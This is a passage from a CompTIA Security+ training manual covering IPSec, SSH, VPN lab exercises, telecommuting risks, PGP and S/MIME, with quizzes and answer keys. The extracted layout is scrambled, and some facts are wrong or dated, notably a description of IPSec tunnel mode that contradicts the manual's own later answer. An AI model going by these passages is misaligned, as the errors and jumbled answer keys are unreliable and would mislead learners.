IP Security Protocol (IPSec) is a suite of protocols used for encrypting data so it can travel securely over a public IP network. It uses OSI layer 3, the network layer, to send encrypted communications between two network devices. Its commonly used to secure VPN communications over an open network. IPSec protocols The IPSec protocol suite is made up of four separate protocols: Authentication Header (AH) protocol signs the data packets using MD5 or SHA1 hashes and a shared secret key. This guarantees authenticity. Encapsulating Security Payload (ESP) protocol encrypts the packet using a symmetric encryption algorithm (DES or 3DES) and shared secret key. This ensures confidentiality. IP Payload Compression Protocol (IPComp) compresses the data packet before transmission. When used in combination with ESP encryption, the compression is applied to the packet before encryption. Internet Key Exchange (IKE) provides an automated method for negotiating the shared secret keys. The protocols might be applied alone or in combination. IPSec encryption modes IPSec also offers two modes of encryption: transport and tunnel. Transport mode encrypts the data portion of each packet, but not the header. This mode is used in host-to-host (peer-to-peer) communications.data portion of each packet Tunnel mode encrypts the date portion of each packet, but not the header. Tunneling allows you to hide the source and destination addresses from hackers. This mode is used by VPN gateways. To use IPSec, both the sender and the recipient must be IPSec compliant.

Remote access How it works

423

To communicate using IPSec, the following steps must take place: 1 An administrator creates an IPSec policy. This contains a set of rules that define what types of traffic (for example, HTTP or FTP) require encryption and which encryption and/or authentications protocols to use. Each rule can specify multiple authentication methods. 2 The administrator distributes the IPSec policy to all targeted machines. 3 The two hosts automatically negotiate the authentication and encryption method to be used for communication. Which protocols are selected depends on the IPSec policy. 4 If the selected protocol requires negotiating secret keys, the IKE is employed. One of three methods is implemented: Both parties use a password known as a pre-shared key. The two parties swap a hashed version of the pre-shared key, and then attempt to recreate the hashed data. If successful, both parties can begin secure communications. Both parties exchange public keys that have been certified by a CA. Both parties use Kerberos v5 for authentication. 5 The IP packets are encrypted and/or signed according to the negotiated terms. All functions of IPSec remain transparent to the user.

Secure Shell
A secure shell (SSH) is a secure replacement for remote logon and file transfer programs such as Telnet and FTP, which transmit data in unencrypted text. SSH uses a public key authentication method to establish an encrypted and secure connection from the users machine to the remote machine. When the secure connection is established, then the username, password, and all other information is sent over this secure connection. SSH is becoming a standard for remote logon administration. It has become so popular there are many ports of SSH for various platforms, and there are free clients available to log on to an SSH server from many platforms as well. SSH Certifier is designed to be a widely applicable product, and it runs on a wide variety of different platforms including Windows, Linux, HP-UX and Solaris. In the enrollment process, the end-user requesting a certificate must be authenticated. If the entity has a valid certificate, the private key can be used for authentication when using certain enrollment protocols; however, the user does not typically possess a valid private key for the enrollment process. First-time authentication can be done either manually or by generating shared secrets for entities. When shared keys are delivered to end entities by secure means, the users can authenticate themselves during the online enrollment, and the request can be approved automatically, if the policy allows automatic acceptance. This method is especially useful in applications in which shared secrets can be delivered in the same package with the client software and certification authority certificate. If the enrollment protocol does not support shared secrets or they are just not used, authentication has to be done in an out-of-band way, such as by showing valid identity information for the operator. The operator can then make the approval decision manually.

Tell students that in SSH, public key authentication is used before a connection is established. Mention that SSH is rapidly replacing Telnet for remote administration of UNIX and Linux systems, and even some Windows systems.

424

CompTIA Security+ Certification The authentication requirements and the certificate templates for the certificate issuance are defined in the certification policy. The policy can be configured via the administration graphical user interface. The key components of an SSH product are the engine, the administration server, the enrollment gateway, and the publishing server. Each of these components can be placed either on separate machines or on a single machine. The engine receives certification requests from the enrollment gateway, makes policy decisions, and generates and signs certificates and Certificate Revocation Lists (CRLs). The engine also communicates with the administration server and performs the required database queries. The administration server is an HTTP server with a Transport layer security (TLS) implementation. The graphical user interface can be easily customized by modifying the HTML code, also by using the script tools of Certifier, the functionality of the GUI can be expanded. The enrollment gateway has the server-side implementations of the supported certificate enrollment protocols. It receives certificate requests from the enrollment clients and forwards them to the engine for policy decisions. The enrollment gateway also sends confirmation messages and issues certificates to end entities. The issued certificates and CRLs are sent to the publishing server, which performs the LDAP publishing in the directory. For more information on IPSec and SSH, visit www.ssh.com.

Do it!

C-3: Using PPTP to connect to a VPN server Heres how Heres why
1 On Server-Y, click Start 2 Choose Control Panel,
Network Connections, New Connection Wizard

Students will perform this activity in pairs on ServerX and Server-Y as indicated in the activity steps. If students are prompted to provide Location information, tell them to enter an area code and click OK twice.

3 Click Next 4 Select Connect to the


network at my workplace

Click Next 5 Select Virtual Private


Network connection

Click Next 6 Type Class VPN PPTP Click Next


To specify a name for the connection

Remote access 7 Enter the IP address of the VPN server (Server-X) Click Next 8 Select Anyone's use Click Next 9 Check Add a shortcut to this
connection to my desktop

425

If you don't know Server-X's IP address, have your partner open a Command window, enter ipconfig and note the server's IP address.

10 Click Finish 11 Log on as Administrator 12 On Server-X, access Computer


Management

You are prompted to log on. You are now connected to Server-X. To configure the Administrator account to require a remote access policy for access. Activate the Dial-in tab in the Properties of the Administrator user to see the option.

13 Change the Administrator user's dial-in access to Control


access through Remote Access Policy

14 At Server-Y, disconnect the Class VPN PPTP connection and try to connect again 15 Close all windows

The connection is denied because an appropriate remote access policy has not been configured.

426
Do it!

CompTIA Security+ Certification

C-4:

Discussing tunneling protocols

Questions and answers


1 TCP/IP transports digital data over the Internet infrastructure. True or false?
True

2 Data sent from a dial-up modem is encapsulated within a(n) _______ packet.
A

PPP IP IPX NetBEUI

B C D

3 PPTP uses IPSec to authenticate users. True or false?


False: It uses PPP for authentication.

4 LT2P uses UDP to encapsulate PPP frames with L2TP headers. True or false?
True

5 L2TP provides tunneling capabilities for which of the following internetworks? A B C


D

Frame Relay ATM IP All of the above

6 Describe the differences in the IPSec transport and tunnel modes.


Transport mode encrypts the data portion of each packet, but not the header. Its typically used in host-to-host VPNs. Tunnel mode encrypts both the header and the data portion of each packet. Its used in host-to-gateway or gateway-to-gateway VPN communications.

7 Which protocol uses the IKE public key system to certify and sign data packets?
Authentication header

8 Which protocol uses symmetric encryption to encrypt the IP payload for confidentiality?
Encapsulating security payload

9 Which of the following protocols can be used with PPTP? A B


C

IPX/SPX NetBEUI TCP/IP AppleTalk

Remote access

427

Topic D: Telecommuting vulnerabilities


This topic covers the following CompTIA Security+exam objective:
# 2.1 Objective Recognize and understand the administration of the following types of remote access technologies Vulnerabilities

Telecommuting
Explanation Many large companies have begun using remote access technologies as a method to reduce costs and improve employee satisfaction. The benefits gained by telecommuting must be carefully weighed against the increased vulnerabilities. In the telecommuting model, the home office is arguably not trusted. The lack of physical access control would indicate that no matter how trusted a computer is when first configured, after spending time at a users home, the state of a machine is in question.

Security issues
Although VPNs and encryption are powerful tools, they do not protect against all threats. Misconfigured firewalls, unrestricted physical access, weak encryption, and sporadic auditing leave the remote PC an easy target for attackers. Split tunneling The simplest VPN configuration consists of a VPN client computer with an Internet connection. This setup can introduce a major risk called split tunneling. Split tunneling allows a remote PC to surf the Web and access the corporate VPN simultaneously. The benefit of split tunneling is that corporations can conserve bandwidth needed for Internet access at VPN hub sites and reduce the load on VPN gateways. The drawback is that, if a remote PC is connected directly to the Web and at the same time tied into the VPN, attackers coming on from the Web could commandeer the PC and gain access to the corporate network. The integrity of the remote PC can just as easily be compromised while the user is Web surfing with the VPN tunnel turned off. Viruses or back doors downloaded while surfing would threaten the VPN the next time it is connected. Unsecured data files As telecommuters download data files to their home PCs, all safeguards implemented at the corporate office to protect sensitive information are negated. The central office has legally lost control over that data. With limited physical protection, hackers can steal portable computers or hard drives and, given enough time, break any security in place. The attacker can gain access to corporate data and, potentially, the corporate network.

428

CompTIA Security+ Certification Compromised certificates Many IT professionals use digital certificates to add a layer of security to their VPN clients. In the context of a computer system in an uncontrolled environment, the certificate can be more vulnerable than traditional password authentication. The attacker can easily crack a weak pass-phrase using brute force. Once compromised, the certificate could be used to authenticate the attacker to the central office and even other businesses. Unlike passwords that change regularly, certificate pass-phrases can be valid for a year or more. War dialing War dialing refers to calling a block of numbers randomly until a modem answers. If the attacker finds a modem, he might use it to dial into another network to avoid longdistance charges or to mask his identity during an attack. Limited accounting Another issue concerning remote access is the lack of auditing. A record of security, system, and application events only exists on the compromised system, a serious violation of the standard for event logging. The moment the VPN link is terminated, the remote computers state cannot be guaranteed. Misconfigured firewalls Home systems connected to the Internet through broadband or cable modem are sharing a bus with other computers in the neighborhood. This provides many opportunities for an attacker to send and receive data undetected. As long as the computer is on, its subject to attack. In addition, personal firewalls provide a false sense of security: when misconfigured, they are ineffective in protecting the system against eavesdroppers and hackers.

Solutions
The following recommendations will protect the remote PC against most threats: Install a personal firewall at the remote PC. Filter both incoming and outgoing packets. Configure Web browsers to limit browser plugins, such as ActiveX and Javascript. Make sure PC operating systems and applications have updated security patches. Use virus-scanning software and update it religiously. Set it to scan incoming email and attachments. Disable cookies to prevent monitoring of browser habits. Use strong passwords. Encrypt sensitive and critical information. One very effective solution that circumvents all the above precautions is to provide the employee with a remote session (or thin-client) solution. This eliminates the issue of storing data on the remote computer. Thin clients have no local storage or functionality beyond connecting to a remote session server. When the connection to the central office is broken, the data stays safely at the central office.

Remote access

429

Configuration of a remote access policy


While remote access is an essential tool for todays businesses, it also has the potential to open a wide range of security holes. One way an administrator can overcome this is by using Windows Server 2003 Remote Access Policies. Remote Access Policies can lock down a remote access system to ensure only those intended to have access are actually granted that access. Do it!

D-1:

Configuring a remote access policy Heres why

Heres how
For this activity, students will work in pairs. Each partnership will use two machines, Server-X and Server-Y. Instruct students to substitute their servers hostname for Server-X and their partners server hostname for Server-Y.

1 On Server-X, click Start Choose Administrative Tools, Routing and Remote


Access To access the Routing and Remote Access window.

2 Expand SERVER-X 3 Right-click Remote Access


Policies

Choose
New Remote Access Policy

To start the New Remote Access Policy wizard.

4 Click Next 5 In the Policy name box, type


Allow all users access

Click Next 6 Click Next 7 Select User Click Next 8 Click Next 9 Click Next 10 Click Finish 11 Double-click Remote Access
Policies You'll see the Allow all users access policy in the right pane. To display the Properties of the remote access policy. Remote access policies are configured to deny rather than grant access by default. To save your changes. To accept the default authentication method. To accept the default Policy Encryption Level. To accept the default access method of VPN.

12 Double-click Allow all users


access

13 Select Grant remote access


permission

Click OK

430

CompTIA Security+ Certification 14 Close the Routing and Remote Access window 15 Open Computer
Management Windows Server 2003 does not allow dial-in access by default. In order to allow remote access to a Windows Server 2003 server, you must configure the Remote Access Permissions on a user-by-user basis. Administrator is an exception to this rule; Administrator is allowed to connect remotely by default.

16 Expand
Local Users and Groups

Select Users 17 Double-click User1 18 Activate the Dial-in tab 19 Select Control access
through Remote Access Policy To change the dial-in access for User1.

Click OK 20 Repeat steps 17 through 19 for User2 21 Log on to Server-Y as User1 and try to access the Class VPN PPTP connection 22 On Server-X, click Start Choose Administrative Tools, Routing and Remote
Access Youll be able to connect using the remote access policy.

To start the process of disabling Routing and Remote Access.

23 Right-click Server-X 24 Choose Disable Routing and


Remote Access

Click Yes 25 Close all windows

User1 is disconnected from the server when the service is stopped.

Remote access

431

Unit summary: Remote access


Topic A In this topic, you learned that with the continued growth of remote access computing, the need for remote access security has become paramount. You learned about some of the challenges faced when communicating over unsecured dial-up, ISDN, DSL, and cable modem channels. In this topic, you learned about the various authentication methods used for remote access. You learned about the IEEE 802.1X protocol, which builds on the standards outlined in the Point-to-Point Protocol (PPP) and Extensible Authentication Protocol (EAP) to control access to the corporate network. You also learned about Remote Authentication Dial-in User Service (RADIUS), which uses open protocols to provide a centralized and scalable security system, and Terminal Access Controller Access Control System (TACACS+), an authentication protocol developed by Cisco Systems to address the need for multiprotocol support and scalability. In this topic, you learned about VPN technology and its tunneling protocols. Corporate networks use site-to-site and remote access VPNs to connect remote offices and users to the corporate network. Four tunneling protocols commonly used in VPN, Point-to-Point Tunneling Protocol (PPTP), L2TP, Secure Shell, and IPSec, use encapsulation and encryption to transmit sensitive data over the Internet. In this topic, you learned about the different vulnerabilities associated with telecommuting. Many large companies have begun using telecommuting as a method to reduce costs and improve employee satisfaction, unfortunately, the benefits gained by telecommuting come with the price of an increased security threat.

Topic B

Topic C

Topic D

Review questions
1 PPTP is built upon _______ and ________, two well-established communications protocols. A PPP, UDP
B

PPP, TCP/IP

C LDAP, PPP D TCP/IP, UDP 2 SSH uses a _____________ key authentication method to establish a secure connection. A Private
B

Public

C Encrypted D Skeleton 3 The RADIUS architecture allows all information to be located on a single central database. True or false?
True

432

CompTIA Security+ Certification 4 _____________ is an authentication method that was developed to address scalability and connection-oriented services. A 802.1X B RADIUS C X.25
D

TACACS+

5 IPSec uses a(n) ______________ algorithm for negotiating which keys to use for symmetric encryption.
A

Asymmetric

B Symmetric C Proprietry D Encryption 6 What are the available PPTP protocol enhancements? (Choose all that apply.) A PPP is multiprotocol B Offers authentication C Offers methods of privacy and compression of data
D

All of the above

7 RADIUS always encrypts the password in the packet. True or false?


True

8 TACACS+ separates which of the following?


A

Authentication, authorization, and accounting

B Authentication, authorization, and availability C Authorization, accounting, and availability D Authentication, accounting, and availability 9 The acronym NAS stands for network authentications server. True or false?
False: It means network access server.

10 Remote access logging can log which of the following events? A Accounting requests B Authentication requests C Periodic status
D

All of the above

51

Unit 5 E-mail
Unit time: 120 minutes Complete this unit, and youll know how to:
A Define secure e-mail and how it works. B Describe the characteristics of PGP and

S/MIME.
C Identify and safeguard against e-mail

vulnerabilities.

52

CompTIA Security+ Certification

Topic A: Secure e-mail and encryption


This topic covers the following CompTIA Security+ exam objective:
# 4.2 Objective Understand how cryptography addresses the following security concepts Confidentiality Integrity Digital Signatures Authentication Non-Repudiation Digital Signatures

E-mail
Explanation Over the course of the past decade, electronic mail has become the mission-critical business application and changed the way we work forever. The result has been a massive increase in productivity; however, e-mail is an incredibly vulnerable tool. For the most part, it is transmitted across the Internet in plaintext so any intermediary could read or modify it, and worse, anyone could set up an e-mail account and claim to be that person. E-mail security is not the only challenge to maintaining the utility and productivity gains offered by e-mail. Floods of spam, or unrequested junk mail, are another hazard that workers in the new digital office must navigate. Hoaxes further threaten to reduce worker productivity and create chaos on the corporate network. The technologies presented in this unit, Pretty Good Privacy (PGP) and Secure/Multipurpose Internet Mail Extension (S/MIME), seek to ensure the integrity and privacy of information by wrapping security measures around the e-mail data itself. These two competing standards use public key encryption techniques.

Goals of secure e-mail


Secure e-mail uses cryptography to secure messages transmitted across insecure networks. The advantage of e-mail encryption is that e-mail can be transmitted over unsecured links without risk that the e-mail will be read or modified. Further, the e-mail can be stored in encrypted form, protecting the contents from prying eyes long after it has been delivered to its destination. Secure e-mail provides four main features: Confidentiality By encrypting messages, the sender and the recipient can transmit data to each other over an unsecured or monitored link (i.e., the Internet) without worrying that their communications are monitored. That is to say, secure e-mail provides a guarantee of privacy. Integrity The communicating parties can also be sure their data has not been modified while in transit. This is a very important feature for many government and commercial applications.

E-mail

53

Authentication Secure e-mail uses secret encryption keys that only the owners know and have access to, so the recipient of the e-mail knows for a fact that it was sent by the person it purports to be from. Nonrepudiation Just as with authentication, the recipient of the message knows for a fact that the message was sent by the person appearing in the messages FROM: field, and that the details of the message body were received as they were written. The sender cannot claim the message did not originate from his or her computer or the contents of the message were changed in transit.

Terminology
The key cryptography concepts you need to understand are encryption, digital signatures, and digital certificates. These concepts are covered briefly in this section so you can recognize how they are used to make e-mail more secure.

Inform the students that, although most of the key terms and concepts relating to cryptography are explained in this unit, they are covered in depth in the Cryptography unit.

Encryption
When people think of secure e-mail, encryption is the technology that comes to mind. Encryption provides privacy, integrity, authentication, and nonrepudiation. These are the primary features of secure e-mail:

Exhibit 5-1: How conventional encryption works Encryption is the conversion of data into code to make it unreadable, as shown in Exhibit 5-1. It is accomplished by taking data and passing it, along with a value, called a key, through an algorithm that makes the data completely unreadable. The only way to recover the information is to reverse the process using the appropriate key. Even though the encryption algorithm is known, without also having the key, it is impossible to recover the original data. The two main types of encryption are; conventional cryptography, in which the same key is used for encryption and decryption, and public key cryptography, which uses a publicly distributed key for encryption and a secret private key for decryption.

54

CompTIA Security+ Certification

Hash function
A hash function is a function that takes plaintext data of any length and creates a unique fixed-length output. For example, the message could be 1 KB or 1 MB in size, but the hash output on either message would be the same fixed length. The result of the hash function is called a message digest. The essential principle of a cryptologically sound hash function is that if the input were changed by a single bit, the message digest would be different. Its also important to remember that the original message cannot be derived from the message digest; hash functions work only in one direction. Two major hash functions are used today. SHA-1 (Secure Hash Algorithm 1) was developed by the National Security Agency (NSA) and is considered the more secure of the two commonly used algorithms. It produces 160-bit digests.
Information about breaking MD5 can be found at scramdisk.clara.net/ pgpfaq.html #SubMD5Implic.

The other common hash algorithm is MD5 (Message Digest algorithm version 5), which produces 128-bit digests. RSA Security has placed MD5 in the public domain; therefore, no licensing is required to use it. Cryptography experts have shown that MD5 has major flaws, and it is likely that it will be broken in the future.

Do it!

A-1:

Discussing encryption and hash functions

Questions and answers


1 What is one measure a user can use to ensure confidentiality when sending e-mail messages?
Encrypt the messages

2 A message digest is the product of running a message through a hash function. True or false?
True

3 Once data is encrypted, the only way to recover the information is to _____. A B C
D

Attach a digital certificate Share the private key Pass it through a hash function Reverse the process using the appropriate key

4 The hash function is a good method for determining whether a message has been altered. True or false?
True

5 A hash function takes plaintext and creates a fixed-length output regardless of the size of the message. True or false?
True

E-mail

55

Digital signatures
Explanation A digital signature is a digital code that can be attached to an electronic message to uniquely identify the sender. Digital signatures provide integrity, authentication, and nonrepudiation. That is, by using a digital signature, a user can receive a plaintext message and still know with a high degree of certainty that the message has not been tampered with, and indeed comes from the person it claims to be from with no possibility the sender could truthfully deny sending the message. Digital signatures are created using hash functions. You perform a hash on the message to create a message digest, and then you sign the message by encrypting the message digest with your own private key, as shown in Exhibit 5-2.

Exhibit 5-2: How digital signatures are created When the receiver gets the message, that person can verify its integrity: the message digest is recreated by performing a hash on the message using the same hashing algorithm as the sender. The message digest is then compared against the digest that came with the message (after decrypting it with the senders public key). If the two versions of the digest are the same, then the message has not been altered. The fact that the receiver can recover the original message digest using the senders public key guarantees its authenticity and provides nonrepudiation.

56

CompTIA Security+ Certification

Digital certificates
A digital certificate is an attachment to an electronic message used for security purposes. It provides a type of credential, much like a passport or drivers license. Digital certificates are similar to digital signatures in that a public key and private key are used, but with digital certificates, there is an endorser who vouches for the authenticity and identity of the public key holder. The digital certificate contains the following information: The owners public key, which is used to encrypt messages to its owner One or more pieces of information that uniquely identify the owner (for example, a name and e-mail address) The digital signature of an endorser (called the Certificate Authority), stating that the public key actually belongs to the person in question Exhibit 5-3 shows the structure of one major digital certificate standard, the X.509 certificate.

Exhibit 5-3: A digital certificate Much like a real certificate, a digital certificate helps others to verify the owner of the public key is who he says he is. This is a valuable addition to the normal features of encryption. Digital certificates are designed to answer the question of whom an e-mail address and public key really belong to; you dont know, unless the sender has a digital certificate and you trust the authority that signed the certificate. In the real world, you might rely on a passport to authoritatively identify the person who carries it, but only because you trust the government to issue the passport only to the right person. The same can be said for digital certificates: the certificate is only as good as your trust for the authority that issued it.

E-mail

57

Combining encryption methods


PGP and S/MIME use a combination of conventional encryption and public key encryption. For that reason, these technologies are said to be hybrid cryptosystems. The reason for this hybrid is to overcome the shortcomings of both public key and conventional (or symmetrical) cryptosystems. Conventional encryption is very fast, but it uses symmetrical keys for encryption and decryption, which is to say, both the recipient and the sender must have the same secret key to encode and decode their messages. The problem lies in sending the secret key to the other person without it being compromised. Worse, in order to keep your conversations private, you need a different set of keys for every person with whom you communicate. Conventional encryption results in what is called the key distribution problem (the challenge of getting keys securely to their recipients). Conversely, public key encryption is slow but has solved the problem of key distribution. In this scheme, each person has a private key and a public key, as shown in Exhibit 5-4.

Exhibit 5-4: How public key encryption works The private key is used for decryption and is kept secret. The public key is used for encryption and is freely distributed. For example, Marys public key is the only key that anyone needs to encrypt a message to her. Once a message has been encrypted using Marys public key, it can only be decrypted with her private key. Not even the sender can decrypt the message once its been encrypted with Marys public key. So key distribution is not an issue with public key technologybut the actual process of encrypting is much, much slower.

58
Do it!

CompTIA Security+ Certification

A-2:

Discussing digital signatures and certificates

Questions and answers


1 Put the following steps in their proper sequence to determine whether a message has been tampered with or came from someone other than the specified sender. ___ The receiver compares his message digest value against the digest that came with the message. ___ The receiver decrypts the message. ___ You perform a hash on the message to create a message digest. ___ The receiver gets the message. ___ Encrypt the message digest with your own private key. ___ The receiver performs a hash on the message to create a message digest. 2 Which of the following uses the same key to encrypt and decrypt?
A

4 1 3 2 5

Conventional cryptography Traditional cryptography Public key cryptography Private key cryptography

B C D

3 Which of the following uses one key to encrypt and another to decrypt? A B
C

Conventional cryptography Traditional cryptography Public key cryptography Private key cryptography

4 Digital signatures provide integrity, confidentiality, and authentication. True or false?


False. They do not provide confidentiality.

5 Digital certificates contain which of the following types of information? A B C


D

The owners public key One or more pieces of information that uniquely identify the owner The digital signature of an endorser All of the above

E-mail

59

6 A hash function takes plaintext and creates a fixed-length output regardless of the size of the message. True or false?
True

7 What is the result of a hash function? A


B

Message Message digest Cipher Cipher text

C D

510

CompTIA Security+ Certification

The encryption process


Explanation PGP and S/MIME encryption systems follow a specific process to secure e-mail messages before they are sent. The steps are: 1 The message is compressed (only with PGP). 2 A session key is created. 3 The message is encrypted using the session key with a symmetrical encryption method. 4 The session key is encrypted with an asymmetrical encryption method. 5 The encrypted session key and the encrypted message are bound together and transmitted to the recipient. The same steps are used, in reverse, to decrypt the message. If PGP is used, then the plaintext is compressed using the ZIP compression routines, provided it is long enough and is not already compressed. The reason for this is that compression adds to the cryptographic strength of the encrypted document because it reduces the patterns in the plaintext. These patterns are then represented in the encrypted version and are one of the primary points of cryptanalysis attack. This is the same method used by commercial compression packages such as WinZip and PKZIP. The e-mail encryption system creates a session key using a random number generated from the users mouse movements and keystrokes. These inputs help to ensure that the number really is randomcomputers have a hard time generating truly random numbers on their own. The plaintext is then encrypted using the session key and a conventional encryption algorithm. Conventional encryption is about 1000 times faster than public key encryption, so using the session key significantly speeds up the process of encrypting the users data. Notice that PGP and S/MIME use different conventional encryption systems. The session key is encrypted using the recipients public key, as shown in Exhibit 5-5. It is decrypted using the recipients private key. This technique leverages the speed and convenience of conventional encryption, but avoids the problem of distributing symmetrical keys that is inherent to conventional encryption; public key encryption allows the symmetrical key to be distributed along with the cipher text. The encrypted session key and the encrypted data are bound together. The encrypted message might now be sent over an unsecured network or channel to the recipient without fear the contents can be read or modified in transit. When you receive such an encrypted message, your e-mail client unbundles the encrypted message and the encrypted session key. The session key is decrypted using your private key. Then the session key is used to decrypt the contents of the message, as shown in Exhibit 5-6. All this happens transparently to the end-user.

E-mail

511

Exhibit 5-5: How secure e-mail encryption works

Exhibit 5-6: How secure e-mail decryption works

512
Do it!

CompTIA Security+ Certification

A-3:

Understanding the encryption process

Questions and answers


1 Put the following steps in the correct sequence to describe the encryption process. ___ A session key is created. ___ The message is compressed (only with PGP). ___ The session key is encrypted with an asymmetrical encryption method. ___ The encrypted session key and the encrypted message are bound together and transmitted to the recipient. ___ The message is encrypted using the session key with a symmetrical encryption method.
2 1 4

2 S/MIME compresses plaintext using ZIP compression before encrypting the message. True or false?
False: PGP compresses the plaintext first.

3 In what manner does compression strengthen encryption?


It reduces the patterns in the plaintext.

4 How is the session key generated?


The encryption system uses a random number generated from the users mouse movements and keystrokes.

5 The plain text message is encrypted using the public key to create cipher text. True or false?
False: The plain text message is encrypted using the session key.

6 How is the session key protected during transmission over the Internet?
The session key is encrypted using the recipients public key.

7 The encrypted session key is sent in a separate message from the cipher text. True or false?
False: It is sent with the cipher text.

8 The session key is decrypted using the recipients private key. True or false?
True

E-mail

513

Topic B: PGP and S/MIME encryption


This topic covers the following CompTIA Security+ exam objective:
# 2.2 Objective Recognize and understand the administration of the following e-mail security concepts S/MIME (Secure Multipurpose Internet Mail Extensions) PGP

Background on PGP
Explanation PGP and S/MIME both use encryption and digital signatures to achieve the goal of secure e-mail, however, their formats and implementations are significantly different. PGP establishes authenticity through a Web of trust and places the responsibility of authentication on each user. S/MIME uses a Certificate Authority (CA) to establish trust. The two protocols are incompatible. PGP is an encryption technology that has grown up with the Internet. PGP was originally written by Phil Zimmerman in 1991 to fill the gap in effective, commercially available encryption software. PGP supports four major symmetric encryption methods: CAST An algorithm for symmetric encryption named after its designers (Carlisle Adams and Stafford Tavares). CAST is owned by Nortel, but available to anyone on a royalty-free basis. CAST is a fast method of encrypting data and has stood up to attempted cryptanalytic attacks. Cast uses a 128-bit key and has no weak or semi-weak keys. International Data Encryption Algorithm (IDEA) Originally published in 1992, IDEA has a decent record of withstanding attacks, and however, the fact that the algorithm must be licensed from Ascom Systec has impeded its adoption. IDEA uses a 128-bit key. Triple Data Encryption Standard (3DES) Based on the DES, which uses a 56bit key, 3DES runs the same algorithm three times to overcome its short key size. Although (3 x 56) bits equals 168 bits, the effective key strength of 3DES is approximately 129 bits. 3DES is perhaps the industry standard algorithm for encryption. 3DES is much slower than either IDEA or CAST. Twofish One of five algorithms that were finalists to be selected for the Advanced Encryption Standard (AES), Twofish was selected for inclusion into PGP before the winner was announced in 2001. Although Twofish was not ultimately selected to be used in the standard, it is a strong algorithm that has withstood examinations by industry experts. Like all AES contestants, Twofish has 128-bit, 192-bit, and 256-bit key sizes.

514

CompTIA Security+ Certification PGP certificates PGP defines its own standard for digital certificates. PGP certificates are very similar to X.509 certificates in some respects but are notably more flexible and extensible. One unique aspect of the PGP certificate format is that a single certificate can contain multiple signatures. Several or many people might sign the key/identification pair to attest to their own assurance that the public key definitely belongs to the specified owner. If you look on a public certificate server, you might notice certain certificates, such as that of PGPs creator, Phil Zimmermann, contain many signatures. The table below provides an outline of the PGP certificate format.
Certificate PGP version number Certificate format Version of PGP, which was used to create the key associated with the certificate. Public portion of your key pair, together with the algorithm of the key, which is RSA, RSA Legacy, Diffie-Hellman or Digital Signature Algorithm (DSA). Identity information about the user, such as his or her name, user ID, e-mail address, ICQ number, photograph, and so on. Signature created with the private key corresponding to the public key associated with this certificate. Start date/time and expiration date/timeindicates when the certificate will expire. Encryption algorithm to which the certificate owner prefers to have information encrypted; the supported algorithms are CAST, IDEA, 3DES, and Twofish.

Certificate holders public key

Certificate holders information

Digital signature of the certificate owner Certificates validity period

Preferred symmetric encryption algorithm for the key

E-mail Do it!

515

B-1: Discussing PGP Questions and answers


1 Match the following symmetric algorithms with their definition: CAST IDEA 3DES Twofish
Twofish CAST 3DES

Offers 128-bit, 192-bit, and 256-bit keys and included in PGP in 2001 Uses a 128-bit key and available to anyone on a royalty-free basis Uses a 56-bit key but runs the same algorithm three times to produce an effective key strength of 129 bits Uses a 128-bit key and is licensed by Ascom Systec

IDEA

2 One unique aspect of the PGP certificate format is that a single certificate can contain: A
B

Single signatures Multiple signatures Multiple public keys Multiple algorithms

C D

3 Which of the following is contained within a PGP certificate? (Choose all that apply.)
A

PGP version number Certificate holders private key Certificate holders information Digital signature of the certificate owner Preferred symmetric encryption algorithm for the key

B
C D E

516

CompTIA Security+ Certification

Background on S/MIME
Explanation S/MIME is a protocol for secure electronic mail and was designed to add security to email messages in MIME format. The security services offered are authentication (using digital signatures) and privacy (using encryption). S/MIME v3 was made a standard in July, 1999, by IETFs S/MIME Working Group. The S/MIME v3 standard consists of six parts: Diffie-Hellman Key Agreement Method (RFC 2631) S/MIME Version 3 Certificate Handling (RFC 2632) S/MIME Version 3 Message Specification (RFC 2633) Enhanced Security Services for S/MIME (RFC 2634) Cryptographic Message Syntax (RFC 3369) Cryptographic Message Syntax (CMS) Algorithms (RFC 3370) S/MIME encryption algorithms S/MIME development began in 1995, and because of the specification needed to work within U.S. government export controls which existed until recently, S/MIME implementations have been required to support 40-bit RC2 (Rivest Cipher 2, a symmetric encryption cipher owned by RSA Data Security), which is known to be a very weak algorithm. Although 3DES is also a supported algorithm, and is in fact recommended, some have criticized S/MIME for being cryptographically weak, but it is only weak if a weak algorithm is chosen. The specification is very clear on the subject. Forty-bit encryption is considered weak by most cryptographers. Using weak cryptography in S/MIME offers little actual security over sending plaintext, however, other features of S/MIME, such as the specification of 3DES and the ability to announce stronger cryptographic capabilities to parties with whom you communicate, allows senders to create messages that use strong encryption. (RFC 2633, page 24) S/MIME recommends three symmetric encryption algorithms: DES, 3DES, and RC2. The adjustable key size of the RC2 algorithm makes it useful for applications intended for export outside the U.S. In some environments, hiding the identity of the sender is a requirement. This is in an effort to prevent traffic analysis, where an eavesdropper could gain valuable information on the communicants even if the message cannot be read. To thwart this, these environments use anonymous e-mailers or gateways that strip off the originating e-mail address. A digital signature could give the eavesdropper another piece of data to identify the sender, who is also the signer. S/MIME prevents this by applying the digital signature first, and then enclosing the signature and the original message in an encrypted digital envelope. In this way, no signature information is exposed to the eavesdropper. X.509 certificates Rather than define its own certificate type as PGP does, S/MIME relies on the X.509 certificate standard. To obtain an X.509 certificate, you must ask a certificate authority (CA) to issue one. You provide your public key, proof that you possess the corresponding private key, and some specific information about yourself. You then digitally sign the information and send the whole packagethe certificate requestto the CA. The CA then performs some due diligence in verifying the information you provided is correct and, if so, generates the certificate and returns it.

E-mail

517

You might think of an X.509 certificate as looking like a standard paper certificate (similar to one you might have received for completing a class in basic first aid) with a public key taped to it. It has your name and some information about you on it, plus the signature of the person who issued it to you. For an outline of the contents of X.509 certificates, see the table below:
Certificate X.509 version Certificate format Identifies which version of the X.509 standard applies to this certificate, which in turn determines what information can be specified in it. Public key of the certificate holder, together with an algorithm identifier that specifies which cryptosystem the key belongs to and any associated key parameters. Unique serial number to distinguish it from other certificates issued. This information is used in numerous ways; for example, when a certificate is revoked, its serial number is placed on a certificate revocation list (CRL). Intended to be unique across the Internet, a DN consists of multiple subsections and might look something like this: CN=Jonathan Public, E-MAIL=jonathanpublic@hotmail.com, OU=Security Team, O=Consulting Inc., C=US (These refer to the subjects Common Name, Organizational Unit, Organization, and Country.) Certificates validity period Unique name of the certificate issuer Start date/time and expiration date/time. Unique name of the entity that signed the certificate. This is normally a CA. Using the certificate implies trusting the entity that signed this certificate. Signature using the private key of the entity that issued the certificate. Algorithm used by the CA to sign the certificate.

Certificate holders public key

Serial number of the certificate

Certificate holders distinguished name (DN)

Digital signature of the issuer Signature algorithm identifier

